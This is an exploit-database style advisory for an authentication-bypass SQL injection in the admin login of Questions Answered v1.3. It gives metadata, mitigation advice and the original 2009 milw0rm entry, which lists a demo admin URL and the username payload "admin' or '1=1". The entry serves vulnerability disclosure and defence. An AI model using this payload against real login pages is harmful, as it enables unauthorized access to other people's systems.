Vendor: Questions Answered
By: Snakespc ALGERIAN HaCkEr
CVSS: 9.3 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: Questions Answered
Affected Version From: v1.3
Affected Version To: v1.3
Patch Exists: NO
Related CWE: N/A
CPE: a:questions_answered:questions_answered:1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Questions Answered v1.3 (Auth Bypass) Remote SQL Injection

Questions Answered v1.3 is vulnerable to remote SQL injection in its admin login. Input supplied in the username field is interpreted as part of the SQL query, which allows an attacker to bypass authentication and gain access to the application.

Mitigation:

Input validation should be used to prevent malicious SQL queries from being sent to the application. Additionally, the application should use parameterized queries to prevent SQL injection.

Exploit-DB raw data:

#--------------------------------------------------------
#Questions Answered v1.3 (Auth Bypass) Remote Sql Injection
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com       
#-------------------------------------------------------
#
#Script:Questions Answered v1.3
#
#Demo:www.nichewebsite.net
#--------------------------------------------------------
#Exploit:
#--------
#Demo:http://demo.nichewebsite.net/admin
#Username:admin' or '1=1 
#Password:Super Cristal
----------------------------------------------------------

# milw0rm.com [2009-08-03]